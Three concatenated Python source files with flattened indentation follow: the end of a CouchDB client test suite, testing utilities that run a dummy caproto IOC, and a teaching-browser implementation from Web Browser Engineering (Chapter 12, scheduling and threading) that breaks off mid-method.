self.assertEqual(self.db.list('foo/list', 'foo/by_id')[1].read(), '1\r\n2\r\n')
self.assertEqual(self.db.list('foo/list', 'foo/by_id', include_header='true')[1].read(), 'id\r\n1\r\n2\r\n')
def test_list_keys(self):
self.assertEqual(self.db.list('foo/list', 'foo/by_id', keys=['1'])[1].read(), '1\r\n')
def test_list_view_params(self):
self.assertEqual(self.db.list('foo/list', 'foo/by_name', startkey='o', endkey='p')[1].read(), '1\r\n')
self.assertEqual(self.db.list('foo/list', 'foo/by_name', descending=True)[1].read(), '2\r\n1\r\n')
class UpdateHandlerTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
update_func = """
function(doc, req) {
if (!doc) {
if (req.id) {
return [{_id : req.id}, "new doc"]
}
return [null, "empty doc"];
}
doc.name = "hello";
return [doc, "hello doc"];
}
"""
design_doc = {'_id': '_design/foo',
'language': 'javascript',
'updates': {'bar': update_func}}
def setUp(self):
super(UpdateHandlerTestCase, self).setUp()
# Workaround for possible bug in CouchDB. Adding a timestamp avoids a
# 409 Conflict error when pushing the same design doc that existed in a
# now deleted database.
design_doc = dict(self.design_doc)
design_doc['timestamp'] = time.time()
self.db.save(design_doc)
self.db.update([{'_id': 'existed', 'name': 'bar'}])
def test_empty_doc(self):
self.assertEqual(self.db.update_doc('foo/bar')[1].read(), 'empty doc')
def test_new_doc(self):
self.assertEqual(self.db.update_doc('foo/bar', 'new')[1].read(), 'new doc')
def test_update_doc(self):
self.assertEqual(self.db.update_doc('foo/bar', 'existed')[1].read(), 'hello doc')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ServerTestCase, 'test'))
suite.addTest(unittest.makeSuite(DatabaseTestCase, 'test'))
suite.addTest(unittest.makeSuite(ViewTestCase, 'test'))
suite.addTest(unittest.makeSuite(ShowListTestCase, 'test'))
suite.addTest(unittest.makeSuite(UpdateHandlerTestCase, 'test'))
suite.addTest(doctest.DocTestSuite(client))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
utils.py
|
"""
Helpful functions that don't belong in a more specific submodule.
"""
import importlib
import logging
import os
import pkgutil
import signal
import uuid
from contextlib import contextmanager
from inspect import isclass, isfunction
from multiprocessing import Process
from ophyd.signal import EpicsSignalBase
logger = logging.getLogger(__name__)
_optional_err = ('Optional dependency caproto missing from python '
'environment. Cannot test server.')
try:
from caproto.server import PVGroup, pvproperty, run
has_caproto = True
except ImportError:
has_caproto = False
logger.debug(_optional_err)
def run_caproto_ioc(device_class, prefix):
"""
Runs a dummy caproto IOC.
Includes all the PVs that device_class will have if instantiated with
prefix.
Assumes only basic :class:`ophyd.Component` instances in the class
definition.
"""
if not has_caproto:
raise ImportError(_optional_err)
pvprops = {}
for suffix in yield_all_suffixes(device_class):
pvprops[suffix] = pvproperty()
DynIOC = type('DynIOC', (PVGroup,), pvprops)
ioc = DynIOC(prefix)
run(ioc.pvdb, module_name='caproto.asyncio.server',
interfaces=['0.0.0.0'])
def yield_all_suffixes(device_class):
"""
Iterates through all full pvname suffixes defined by device_class.
Assumes only basic :class:`ophyd.Component` instances in the class
definition.
"""
for walk in device_class.walk_components():
if issubclass(walk.item.cls, EpicsSignalBase):
suffix = get_suffix(walk)
yield suffix
def get_suffix(walk):
"""
Returns the full pvname suffix from a ComponentWalk instance.
This means everything after the top-level device's prefix.
Assumes that walk is an :class:`ophyd.signal.EpicsSignalBase`
subclass and that it was defined using only
:class:`ophyd.Component` in the device ancestors tree.
"""
suffix = ''
for cls, attr in zip(walk.ancestors, walk.dotted_name.split('.')):
suffix += getattr(cls, attr).suffix
return suffix
@contextmanager
def caproto_context(device_class, prefix):
"""
Yields a caproto process with all elements of the input device.
The caproto IOC will be run in a background process, making it suitable for
testing devices in the main process.
"""
if not has_caproto:
raise ImportError(_optional_err)
proc = Process(target=run_caproto_ioc, args=(device_class, prefix))
proc.start()
yield
if proc.is_alive():
os.kill(proc.pid, signal.SIGKILL)
def random_prefix():
"""Returns a random prefix to avoid test cross-talk."""
return str(uuid.uuid4())[:8] + ':'
def is_native(obj, module):
"""
Determines if obj was defined in module.
Returns True if obj was defined in this module.
Returns False if obj was not defined in this module.
Returns None if we can't figure it out, e.g. if this is a primitive type.
"""
try:
return module.__name__ in obj.__module__
except (AttributeError, TypeError):
return None
def get_native_functions(module):
"""Returns a set of all functions and methods defined in module."""
return get_native_methods(module, module)
def get_native_methods(cls, module, *, native_methods=None, seen=None):
"""Returns a set of all methods defined in cls that belong to module."""
if native_methods is None:
native_methods = set()
if seen is None:
seen = set()
for obj in cls.__dict__.values():
try:
if obj in seen:
continue
seen.add(obj)
except TypeError:
# Unhashable type, definitely not a class or function
continue
if not is_native(obj, module):
continue
elif isclass(obj):
get_native_methods(obj, module, native_methods=native_methods,
seen=seen)
elif isfunction(obj):
native_methods.add(obj)
return native_methods
def get_submodules(module_name):
"""Returns a list of the imported module plus all submodules."""
submodule_names = get_submodule_names(module_name)
return import_modules(submodule_names)
def get_submodule_names(module_name):
"""
Returns a list of the module name plus all importable submodule names.
"""
module = importlib.import_module(module_name)
submodule_names = [module_name]
try:
module_path = module.__path__
except AttributeError:
# This attr is missing if there are no submodules
return submodule_names
for _, submodule_name, is_pkg in pkgutil.walk_packages(module_path):
if submodule_name != '__main__':
full_submodule_name = module_name + '.' + submodule_name
submodule_names.append(full_submodule_name)
if is_pkg:
subsubmodule_names = get_submodule_names(full_submodule_name)
submodule_names.extend(subsubmodule_names)
return submodule_names
def import_modules(modules):
"""
Utility function to import an iterator of module names as a list.
Skips over modules that are not importable.
"""
module_objects = []
for module_name in modules:
try:
module_objects.append(importlib.import_module(module_name))
except ImportError:
pass
return module_objects
|
lab12.py
|
"""
This file compiles the code in Web Browser Engineering,
up to and including Chapter 12 (Scheduling and Threading),
without exercises.
"""
import argparse
import dukpy
import functools
import socket
import ssl
import time
import threading
import tkinter
import tkinter.font
from lab10 import request
class Timer:
def __init__(self):
self.phase = None
self.time = None
self.accumulated = 0
def reset(self):
self.accumulated = 0
def start(self, name):
if self.phase: self.stop()
self.phase = name
self.time = time.time()
def stop(self):
dt = time.time() - self.time
print("[{:>10.6f}] {}".format(dt, self.phase))
self.phase = None
self.accumulated += dt
def print_accumulated(self):
print("[{:>10.6f}] {}\n".format(self.accumulated, "Total"))
def url_origin(url):
return "/".join(url.split("/")[:3])
class Text:
def __init__(self, text):
self.text = text
def __repr__(self):
return "\"" + self.text.replace("\n", "\\n") + "\""
SELF_CLOSING_TAGS = [
"area", "base", "br", "col", "embed", "hr", "img", "input",
"link", "meta", "param", "source", "track", "wbr",
]
class Tag:
def __init__(self, text):
parts = text.split()
self.tag = parts[0].lower()
self.attributes = {}
for attrpair in parts[1:]:
if "=" in attrpair:
key, value = attrpair.split("=", 1)
if len(value) > 2 and value[0] in ["'", "\""]:
value = value[1:-1]
self.attributes[key.lower()] = value
else:
self.attributes[attrpair.lower()] = ""
def __repr__(self):
return "<" + self.tag + ">"
def lex(body):
out = []
text = ""
in_tag = False
for c in body:
if c == "<":
in_tag = True
if text: out.append(Text(text))
text = ""
elif c == ">":
in_tag = False
out.append(Tag(text))
text = ""
else:
text += c
if not in_tag and text:
out.append(Text(text))
return out
class ElementNode:
def __init__(self, tag, attributes):
self.tag = tag
self.attributes = attributes
self.children = []
self.style = {}
for pair in self.attributes.get("style", "").split(";"):
if ":" not in pair: continue
prop, val = pair.split(":")
self.style[prop.strip().lower()] = val.strip()
def __repr__(self):
return "<" + self.tag + ">"
class TextNode:
def __init__(self, text):
self.text = text
self.tag = None
self.children = []
def __repr__(self):
return self.text.replace("\n", "\\n")
def parse(tokens):
currently_open = []
for tok in tokens:
implicit_tags(tok, currently_open)
if isinstance(tok, Text):
node = TextNode(tok.text)
if not currently_open: continue
node.parent = currently_open[-1]
currently_open[-1].children.append(node)
elif tok.tag.startswith("/"):
node = currently_open.pop()
if not currently_open: return node
currently_open[-1].children.append(node)
elif tok.tag in SELF_CLOSING_TAGS:
node = ElementNode(tok.tag, tok.attributes)
node.parent = currently_open[-1]
currently_open[-1].children.append(node)
elif tok.tag.startswith("!"):
continue
else:
node = ElementNode(tok.tag, tok.attributes)
node.parent = currently_open[-1]
currently_open.append(node)
while currently_open:
node = currently_open.pop()
if not currently_open: return node
currently_open[-1].children.append(node)
HEAD_TAGS = [
"base", "basefont", "bgsound", "noscript",
"link", "meta", "title", "style", "script",
]
def implicit_tags(tok, currently_open):
tag = tok.tag if isinstance(tok, Tag) else None
while True:
open_tags = [node.tag for node in currently_open]
if open_tags == [] and tag != "html":
node = ElementNode("html", {})
node.parent = None
currently_open.append(node)
elif open_tags == ["html"] and tag not in ["head", "body", "/html"]:
if tag in HEAD_TAGS:
implicit = "head"
else:
implicit = "body"
node = ElementNode(implicit, {})
node.parent = currently_open[-1]
currently_open.append(node)
elif open_tags == ["html", "head"] and tag not in ["/head"] + HEAD_TAGS:
node = currently_open.pop()
currently_open[-1].children.append(node)
else:
break
class CSSParser:
def __init__(self, s):
self.s = s
def whitespace(self, i):
while i < len(self.s) and self.s[i].isspace():
i += 1
return None, i
def literal(self, i, literal):
l = len(literal)
assert self.s[i:i+l] == literal
return None, i + l
def word(self, i):
j = i
while j < len(self.s) and self.s[j].isalnum() or self.s[j] in "-.":
j += 1
assert j > i
return self.s[i:j], j
def pair(self, i):
prop, i = self.word(i)
_, i = self.whitespace(i)
_, i = self.literal(i, ":")
_, i = self.whitespace(i)
val, i = self.word(i)
return (prop.lower(), val), i
def ignore_until(self, i, chars):
while i < len(self.s) and self.s[i] not in chars:
i += 1
return None, i
def body(self, i):
pairs = {}
_, i = self.literal(i, "{")
_, i = self.whitespace(i)
while i < len(self.s) and self.s[i] != "}":
try:
(prop, val), i = self.pair(i)
pairs[prop] = val
_, i = self.whitespace(i)
_, i = self.literal(i, ";")
except AssertionError:
_, i = self.ignore_until(i, [";", "}"])
if i < len(self.s) and self.s[i] == ";":
_, i = self.literal(i, ";")
_, i = self.whitespace(i)
_, i = self.literal(i, "}")
return pairs, i
def selector(self, i):
if self.s[i] == "#":
_, i = self.literal(i, "#")
name, i = self.word(i)
return IdSelector(name), i
elif self.s[i] == ".":
_, i = self.literal(i, ".")
name, i = self.word(i)
return ClassSelector(name), i
else:
name, i = self.word(i)
return TagSelector(name.lower()), i
def rule(self, i):
selector, i = self.selector(i)
_, i = self.whitespace(i)
body, i = self.body(i)
return (selector, body), i
def file(self, i):
rules = []
_, i = self.whitespace(i)
while i < len(self.s):
try:
rule, i = self.rule(i)
rules.append(rule)
except AssertionError:
_, i = self.ignore_until(i, "}")
_, i = self.literal(i, "}")
_, i = self.whitespace(i)
return rules, i
def parse(self):
rules, _ = self.file(0)
return rules
class TagSelector:
def __init__(self, tag):
self.tag = tag
def matches(self, node):
return self.tag == node.tag
def priority(self):
return 1
class ClassSelector:
def __init__(self, cls):
self.cls = cls
def matches(self, node):
return self.cls in node.attributes.get("class", "").split()
def priority(self):
return 16
class IdSelector:
def __init__(self, id):
self.id = id
def matches(self, node):
return self.id == node.attributes.get("id", "")
def priority(self):
return 256
INHERITED_PROPERTIES = {
"font-style": "normal",
"font-weight": "normal",
"font-size": "16px",
"color": "black",
}
def style(node, parent, rules):
if isinstance(node, TextNode):
node.style = parent.style
else:
for selector, pairs in rules:
if selector.matches(node):
for property in pairs:
if property not in node.style:
node.style[property] = pairs[property]
for property, default in INHERITED_PROPERTIES.items():
if property not in node.style:
if parent:
node.style[property] = parent.style[property]
else:
node.style[property] = default
for child in node.children:
style(child, node, rules)
WIDTH, HEIGHT = 800, 600
HSTEP, VSTEP = 13, 18
SCROLL_STEP = 100
class LineLayout:
def __init__(self, node, parent):
self.node = node
self.parent = parent
self.cx = 0
self.laid_out = False
self.children = []
def append(self, child):
self.children.append(child)
child.parent = self
self.cx += child.w + child.font.measure(" ")
def size(self):
self.w = self.parent.w
self.compute_height()
def compute_height(self):
if not self.children:
self.h = 0
self.max_ascent = 0
self.max_descent = 0
self.metrics = None
self.cxs = []
return
self.metrics = [child.font.metrics() for child in self.children]
self.max_ascent = max([metric["ascent"] for metric in self.metrics])
self.max_descent = max([metric["descent"] for metric in self.metrics])
self.h = 1.25 * (self.max_descent + self.max_ascent)
cx = 0
self.cxs = []
for child in self.children:
self.cxs.append(cx)
cx += child.w + child.font.measure(" ")
def position(self):
baseline = self.y + 1.25 * self.max_ascent
if self.children:
for cx, child, metrics in \
zip(self.cxs, self.children, self.metrics):
child.x = self.x + cx
child.y = baseline - metrics["ascent"]
def paint(self, to):
for child in self.children:
child.paint(to)
FONT_CACHE = {}
def GetFont(size, weight, style):
key = (size, weight, style)
value = FONT_CACHE.get(key)
if value: return value
value = tkinter.font.Font(size=size, weight=weight, slant=style)
FONT_CACHE[key] = value
return value
class TextLayout:
def __init__(self, node, word):
self.node = node
self.children = []
self.word = word
self.display_item = None
def size(self):
self.display_item = None
weight = self.node.style["font-weight"]
style = self.node.style["font-style"]
if style == "normal": style = "roman"
size = int(px(self.node.style["font-size"]) * .75)
self.font = GetFont(size, weight, style)
self.w = self.font.measure(self.word)
self.compute_height()
def compute_height(self):
self.h = self.font.metrics('linespace')
def position(self):
pass
def paint(self, to):
if not self.display_item:
color = self.node.style["color"]
self.display_item = DrawText(self.x, self.y, self.word, self.font, color)
to.append(self.display_item)
class InputLayout:
def __init__(self, node):
self.node = node
self.children = []
def size(self):
weight = self.node.style["font-weight"]
style = self.node.style["font-style"]
if style == "normal": style = "roman"
size = int(px(self.node.style["font-size"]) * .75)
self.font = tkinter.font.Font(size=size, weight=weight, slant=style)
self.w = 200
self.compute_height()
def compute_height(self):
self.h = 20
def position(self):
pass
def paint(self, to):
x1, x2 = self.x, self.x + self.w
y1, y2 = self.y, self.y + self.h
bgcolor = "light gray" if self.node.tag == "input" else "yellow"
to.append(DrawRect(x1, y1, x2, y2, bgcolor))
if self.node.tag == "input":
text = self.node.attributes.get("value", "")
else:
text = self.node.children[0].text
color = self.node.style["color"]
to.append(DrawText(self.x, self.y, text, self.font, color))
class InlineLayout:
def __init__(self, node, parent):
self.node = node
self.parent = parent
def size(self):
self.children = [LineLayout(self.node, self)]
self.mt = self.bt = self.pt = 0
self.mr = self.br = self.pr = 0
self.mb = self.bb = self.pb = 0
self.ml = self.bl = self.pl = 0
self.w = self.parent.w - self.parent.pl - self.parent.pr \
- self.parent.bl - self.parent.br
self.recurse(self.node)
self.flush()
self.children.pop()
self.compute_height()
def compute_height(self):
self.h = 0
for child in self.children:
self.h += child.h
def recurse(self, node):
if isinstance(node, TextNode):
self.text(node)
elif node.tag == "br":
self.flush()
elif node.tag == "input":
self.input(node)
elif node.tag == "button":
self.input(node)
else:
for child in node.children:
self.recurse(child)
def text(self, node):
for word in node.text.split():
child = TextLayout(node, word)
child.size()
if self.children[-1].cx + child.w > self.w:
self.flush()
self.children[-1].append(child)
def input(self, node):
child = InputLayout(node)
child.size()
if self.children[-1].cx + child.w > self.w:
self.flush()
self.children[-1].append(child)
def flush(self):
child = self.children[-1]
child.size()
self.children.append(LineLayout(self.node, self))
def position(self):
cy = self.y
for child in self.children:
child.x = self.x
child.y = cy
child.position()
cy += child.h
def paint(self, to):
for child in self.children:
child.paint(to)
def px(s):
if s.endswith("px"):
return int(s[:-2])
else:
return 0
class BlockLayout:
def __init__(self, node, parent):
self.node = node
self.parent = parent
self.x = -1
self.y = -1
self.w = -1
self.h = -1
def has_block_children(self):
for child in self.node.children:
if isinstance(child, TextNode):
if not child.text.isspace():
return False
elif child.style.get("display", "block") == "inline":
return False
return True
def size(self):
self.children = []
# block layout here
if self.has_block_children():
for child in self.node.children:
if isinstance(child, TextNode): continue
self.children.append(BlockLayout(child, self))
else:
self.children.append(InlineLayout(self.node, self))
self.mt = px(self.node.style.get("margin-top", "0px"))
self.bt = px(self.node.style.get("border-top-width", "0px"))
self.pt = px(self.node.style.get("padding-top", "0px"))
self.mr = px(self.node.style.get("margin-right", "0px"))
self.br = px(self.node.style.get("border-right-width", "0px"))
self.pr = px(self.node.style.get("padding-right", "0px"))
self.mb = px(self.node.style.get("margin-bottom", "0px"))
self.bb = px(self.node.style.get("border-bottom-width", "0px"))
self.pb = px(self.node.style.get("padding-bottom", "0px"))
self.ml = px(self.node.style.get("margin-left", "0px"))
self.bl = px(self.node.style.get("border-left-width", "0px"))
self.pl = px(self.node.style.get("padding-left", "0px"))
self.w = self.parent.w - self.parent.pl - self.parent.pr \
- self.parent.bl - self.parent.br \
- self.ml - self.mr
for child in self.children:
child.size()
self.compute_height()
def compute_height(self):
self.h = 0
for child in self.children:
self.h += child.mt + child.h + child.mb
def position(self):
self.y += self.mt
self.x += self.ml
y = self.y
for child in self.children:
child.x = self.x + self.pl + self.bl
child.y = y
child.position()
y += child.mt + child.h + child.mb
def paint(self, to):
if self.node.tag == "pre":
x2, y2 = self.x + self.w, self.y + self.h
to.append(DrawRect(self.x, self.y, x2, y2, "gray"))
for child in self.children:
child.paint(to)
class DocumentLayout:
def __init__(self, node):
self.node = node
self.parent = None
self.children = []
self.x = -1
self.y = -1
self.w = -1
self.h = -1
def size(self):
child = BlockLayout(self.node, self)
self.children.append(child)
self.w = WIDTH
self.mt = self.bt = self.pt = 0
self.mr = self.br = self.pr = 0
self.mb = self.bb = self.pb = 0
self.ml = self.bl = self.pl = 0
child.size()
self.compute_height()
def compute_height(self):
self.h = self.children[0].h
def position(self):
child = self.children[0]
child.x = self.x = 0
child.y = self.y = 0
child.position()
def paint(self, to):
self.children[0].paint(to)
class DrawText:
def __init__(self, x1, y1, text, font, color):
self.x1 = x1
self.y1 = y1
self.text = text
self.font = font
self.color = color
self.y2 = y1 + font.measure("linespace")
def draw(self, scroll, canvas):
canvas.create_text(
self.x1, self.y1 - scroll,
text=self.text,
font=self.font,
fill=self.color,
anchor='nw',
)
class DrawRect:
def __init__(self, x1, y1, x2, y2, color):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
def draw(self, scroll, canvas):
canvas.create_rectangle(
self.x1, self.y1 - scroll,
self.x2, self.y2 - scroll,
width=0,
fill=self.color,
)
def find_links(node, lst):
if not isinstance(node, ElementNode): return
if node.tag == "link" and \
node.attributes.get("rel", "") == "stylesheet" and \
"href" in node.attributes:
lst.append(node.attributes["href"])
for child in node.children:
find_links(child, lst)
return lst
def resolve_url(url, current):
if "://" in url:
return url
elif url.startswith("/"):
return "/".join(current.split("/")[:3]) + url
else:
return current.rsplit("/", 1)[0] + "/" + url
def find_layout(x, y, tree):
for child in reversed(tree.children):
result = find_layout(x, y, child)
if result: return result
if tree.x <= x < tree.x + tree.w and \
tree.y <= y < tree.y + tree.h:
return tree
def find_inputs(elt, out):
if not isinstance(elt, ElementNode): return
if elt.tag == "input" and "name" in elt.attributes:
out.append(elt)
for child in elt.children:
find_inputs(child, out)
return out
def find_scripts(node, out):
if not isinstance(node, ElementNode): return
if node.tag == "script" and \
"src" in node.attributes:
out.append(node.attributes["src"])
for child in node.children:
find_scripts(child, out)
return out
def find_selected(node, sel, out):
if not isinstance(node, ElementNode): return
if sel.matches(node):
out.append(node)
for child in node.children:
find_selected(child, sel, out)
return out
def layout_for_node(tree, node):
if tree.node == node:
return tree
for child in tree.children:
out = layout_for_node(child, node)
if out: return out
def is_link(node):
return isinstance(node, ElementNode) \
and node.tag == "a" and "href" in node.attributes
def drawHTMLTree(node, indent=0):
print(" "*indent, type(node).__name__, " ", node, sep="")
for child in node.children:
drawHTMLTree(child, indent + 2)
def drawLayoutTree(node, indent=0):
print(" "*indent, type(node).__name__, " ", node.node, sep="")
for child in node.children:
drawLayoutTree(child, indent + 2)
REFRESH_RATE_MS = 16 # 16ms
class Task:
def __init__(self, task_code, arg1=None, arg2=None):
self.task_code = task_code
self.arg1 = arg1
self.arg2 = arg2
self.__name__ = "task"
def __call__(self):
if self.arg2:
self.task_code(self.arg1, self.arg2)
elif self.arg1:
self.task_code(self.arg1)
else:
self.task_code()
# Prevent it accidentally running twice.
self.task_code = None
self.arg1 = None
self.arg2 = None
class TaskQueue:
def __init__(self, lock):
self.tasks = []
self.lock = lock
def add_task(self, task_code):
self.lock.acquire(blocking=True)
self.tasks.append(task_code)
self.lock.release()
def has_tasks(self):
self.lock.acquire(blocking=True)
retval = len(self.tasks) > 0
self.lock.release()
return retval
def get_next_task(self):
self.lock.acquire(blocking=True)
retval = self.tasks.pop(0)
self.lock.release()
return retval
class MainThreadRunner:
def __init__(self, browser):
self.lock = threading.Lock()
self.browser = browser
self.needs_animation_frame = False
self.main_thread = threading.Thread(target=self.run, args=())
self.script_tasks = TaskQueue(self.lock)
self.browser_tasks = TaskQueue(self.lock)
def schedule_animation_frame(self):
self.lock.acquire(blocking=True)
self.needs_animation_frame = True
self.lock.release()
def schedule_script_task(self, script):
self.script_tasks.add_task(script)
def schedule_browser_task(self, callback):
self.browser_tasks.add_task(callback)
def schedule_event_handler():
pass
def start(self):
self.main_thread.start()
def run(self):
while True:
self.lock.acquire(blocking=True)
needs_animation_frame = self.needs_animation_frame
self.lock.release()
if needs_animation_frame:
browser.run_animation_frame()
self.browser.commit()
browser_method = None
if self.browser_tasks.has_tasks():
browser_method = self.browser_tasks.get_next_task()
if browser_method:
browser_method()
script = None
if self.script_tasks.has_tasks():
script = self.script_tasks.get_next_task()
if script:
script()
time.sleep(0.001) # 1ms
class Browser:
def __init__(self):
self.window = tkinter.Tk()
self.canvas = tkinter.Canvas(
self.window,
width=WIDTH,
height=HEIGHT
)
self.canvas.pack()
self.cookies = {}
self.history = []
self.focus = None
self.address_bar = ""
self.scroll = 0
self.display_list = []
self.draw_display_list = []
self.needs_draw = False
self.document = None
self.main_thread_timer = Timer()
self.compositor_thread_timer = Timer()
self.window.bind("<Down>", self.scrolldown)
self.window.bind("<Button-1>", self.compositor_handle_click)
self.window.bind("<Key>", self.compositor_keypress)
self.window.bind("<Return>", self.press_enter)
self.reflow_roots = []
self.needs_layout_tree_rebuild = False
self.needs_animation_frame = False
self.display_scheduled = False
self.needs_raf_callbacks = False
self.frame_count = 0
self.compositor_lock = threading.Lock()
self.needs_quit = False
def commit(self):
self.compositor_lock.acquire(blocking=True)
self.needs_draw = True
self.draw_display_list = self.display_list.copy()
self.compositor_lock.release()
def start(self):
self.main_thread_runner = MainThreadRunner(self)
self.main_thread_runner.start()
self.canvas.after(1, self.maybe_draw)
def maybe_draw(self):
self.compositor_lock.acquire(blocking=True)
if self.needs_quit:
sys.exit()
if self.needs_animation_frame and not self.display_scheduled:
self.canvas.after(
REFRESH_RATE_MS,
self.main_thread_runner.schedule_animation_frame)
self.display_scheduled = True
if self.needs_draw:
self.draw()
self.needs_draw = False
self.compositor_lock.release()
self.canvas.after(1, self.maybe_draw)
# Runs on the compositor thread
def compositor_handle_click(self, e):
self.focus = None
if e.y < 60:
# Browser chrome clicks can be handled without the main thread...
if 10 <= e.x < 35 and 10 <= e.y < 50:
self.go_back()
elif 50 <= e.x < 790 and 10 <= e.y < 50:
self.focus = "address bar"
self.address_bar = ""
self.set_needs_animation_frame()
else:
# ...but not clicks within the web page contents area
self.main_thread_runner.schedule_browser_task(
Task(self.handle_click, e))
# Runs on the main thread
def handle_click(self, e):
# Lock to check scroll, which is updated on the compositor thread.
self.compositor_lock.acquire(blocking=True)
x, y = e.x, e.y + self.scroll - 60
self.compositor_lock.release()
self.run_rendering_pipeline()
obj = find_layout(x, y, self.document)
if not obj: return
elt = obj.node
if elt and self.dispatch_event("click", elt): return
while elt:
if isinstance(elt, TextNode):
pass
elif is_link(elt):
url = resolve_url(elt.attributes["href"], self.url)
return self.schedule_load(url)
elif elt.tag == "input":
elt.attributes["value"] = ""
self.focus = obj
self.set_needs_reflow(self.focus)
elif elt.tag == "button":
self.submit_form(elt)
elt = elt.parent
# Runs on the compositor thread
def compositor_keypress(self, e):
if len(e.char) == 0: return
if not (0x20 <= ord(e.char) < 0x7f): return
if not self.focus:
return
elif self.focus == "address bar":
self.address_bar += e.char
self.set_needs_animation_frame()
else:
self.main_thread_runner.schedule_browser_task(
Task(self.keypress, e))
# Runs on the main thread
def keypress(self, e):
self.focus.node.attributes["value"] += e.char
self.dispatch_event("change", self.focus.node)
self.set_needs_reflow(self.focus)
def submit_form(self, elt):
while elt and elt.tag != "form":
elt = elt.parent
if not elt: return
if self.dispatch_event("submit", elt): return
inputs = find_inputs(elt, [])
body = ""
for input in inputs:
name = input.attributes["name"]
value = input.attributes.get("value", "")
body += "&" + name + "=" + value.replace(" ", "%20")
body = body[1:]
url = resolve_url(elt.attributes["action"], self.url)
self.schedule_load(url, body)
# Runs on the compositor thread
def press_enter(self, e):
if self.focus == "address bar":
self.focus = None
self.schedule_load(self.address_bar)
def go_back(self):
if len(self.history) > 1:
self.history.pop()
back = self.history.pop()
self.schedule_load(back)
def cookie_string(self):
cookie_string = ""
for key, value in self.cookies.items():
cookie_string += "&" + key + "=" + value
return cookie_string[1:]
# Runs on the compositor thread
def schedule_load(self, url, body=None):
self.main_thread_runner.schedule_browser_task(
Task(self.load, url, body))
# Runs on the main thread
def load(self, url, body=None):
if args.compute_main_thread_timings:
self.main_thread_timer.start("Downloading")
self.address_bar = url
self.url = url
self.history.append(url)
req_headers = { "Cookie": self.cookie_string() }
headers, body = request(url, headers=req_headers, payload=body)
if "set-cookie" in headers:
kv, params = headers["set-cookie"].split(";", 1)
key, value = kv.split("=", 1)
origin = url_origin(self.history[-1])
self.cookies.setdefault(origin, {})[key] = value
if args.compute_main_thread_timings:
self.main_thread_timer.start("Parsing HTML")
self.nodes = parse(lex(body))
# drawHTMLTree(self.nodes)
if args.compute_main_thread_timings:
self.main_thread_timer.start("Parsing CSS")
with open("browser8.css") as f:
self.rules = CSSParser(f.read()).parse()
for link in find_links(self.nodes, []):
header, body = request(resolve_url(link, url), headers=req_headers)
self.rules.extend(CSSParser(body).parse())
self.rules.sort(key=lambda x: x[0].priority())
self.rules.reverse()
self.run_scripts()
self.set_needs_layout_tree_rebuild()
def load_scripts(self, scripts):
req_headers = { "Cookie": self.cookie_string() }
for script in find_scripts(self.nodes, []):
header, body = request(
resolve_url(script, self.history[-1]), headers=req_headers)
scripts.append([header, body])
def script_run_wrapper(self, script_text):
return Task(self.js.evaljs, script_text)
def run_scripts(self):
if args.compute_main_thread_timings:
self.main_thread_timer.start("Running JS")
self.setup_js()
scripts=[]
self.load_scripts(scripts)
for [header, body] in scripts:
self.main_thread_runner.schedule_script_task(
self.script_run_wrapper(body))
def setup_js(self):
self.js = dukpy.JSInterpreter()
self.node_to_handle = {}
self.handle_to_node = {}
self.js.export_function("log", print)
self.js.export_function("querySelectorAll", self.js_querySelectorAll)
self.js.export_function("getAttribute", self.js_getAttribute)
self.js.export_function("innerHTML", self.js_innerHTML)
self.js.export_function("cookie", self.cookie_string)
self.js.export_function(
"requestAnimationFrame",
self.js_requestAnimationFrame)
self.js.export_function("now", self.js_now)
with open("runtime13.js") as f:
self.main_thread_runner.schedule_script_task(
self.script_run_wrapper(f.read()))
def js_querySelectorAll(self, sel):
selector, _ = CSSParser(sel + "{").selector(0)
elts = find_selected(self.nodes, selector, [])
return [self.make_handle(elt) for elt in elts]
def js_getAttribute(self, handle, attr):
elt = self.handle_to_node[handle]
return elt.attributes.get(attr, None)
def js_innerHTML(self, handle, s):
try:
self.run_rendering_pipeline()
doc = parse(lex("<!doctype><html><body>" +
s + "</body></html>"))
new_nodes = doc.children[0].children
elt = self.handle_to_node[handle]
elt.children = new_nodes
for child in elt.children:
child.parent = elt
if self.document:
self.set_needs_reflow(
layout_for_node(self.document, elt))
else:
self.set_needs_layout_tree_rebuild()
except:
import traceback
traceback.print_exc()
raise
def js_requestAnimationFrame(self):
self.needs_raf_callbacks = True
self.set_needs_animation_frame()
def js_now(self):
return int(time.time() * 1000)
def dispatch_event(self, type, elt):
handle = self.node_to_handle.get(elt, -1)
do_default = self.js.evaljs("__runHandlers({}, \"{}\")".format(handle, type))
return not do_default
def make_handle(self, elt):
if elt not in self.node_to_handle:
handle = len(self.node_to_handle)
self.node_to_handle[elt] = handle
self.handle_to_node[handle] = elt
else:
handle = self.node_to_handle[elt]
return handle
def set_needs_reflow(self, layout_object):
self.reflow_roots.append(layout_object)
self.set_needs_animation_frame()
def set_needs_layout_tree_rebuild(self):
self.needs_layout_tree_rebuild = True
self.set_needs_animation_frame()
def set_needs_animation_frame(self):
self.compositor_lock.acquire(blocking=True)
if not self.display_scheduled:
self.needs_animation_frame = True
self.compositor_lock.release()
def quit(self):
self.compositor_lock.acquire(blocking=True)
self.needs_quit = True
self.compositor_lock.release();
def run_animation_frame(self):
self.needs_animation_frame = False
if args.compute_main_thread_timings:
self.main_thread_timer.reset()
if (self.needs_raf_callbacks):
self.needs_raf_callbacks = False
if args.compute_main_thread_timings:
self.main_thread_timer.start("runRAFHandlers")
self.js.evaljs("__runRAFHandlers()")
self.run_rendering_pipeline()
# This will cause a draw to the screen, even if there are pending
# requestAnimationFrame callbacks for the *next* frame (which may have
# been registered during a call to __runRAFHandlers). By default,
# tkinter doesn't run these until there are no more event queue
# tasks.
if args.compute_main_thread_timings:
self.main_thread_timer.start("IdleTasks")
self.canvas.update_idletasks()
if args.compute_main_thread_timings:
self.main_thread_timer.stop()
self.main_thread_timer.print_accumulated()
self.frame_count = self.frame_count + 1
if args.stop_after > 0 and self.frame_count > args.stop_after:
self.quit()
sys.exit()
def run_rendering_pipeline(self):
if self.needs_layout_tree_rebuild:
self.document = DocumentLayout(self.nodes)
self.reflow_roots = [self.document]
self.needs_layout_tree_rebuild = False
for reflow_root in self.reflow_roots:
self.reflow(reflow_root)
self.reflow_roots = []
self.paint()
self.max_y = self.document.h - HEIGHT
# drawLayoutTree(self.document)
def paint(self):
if args.compute_main_thread_timings:
self.main_thread_timer.start("Paint")
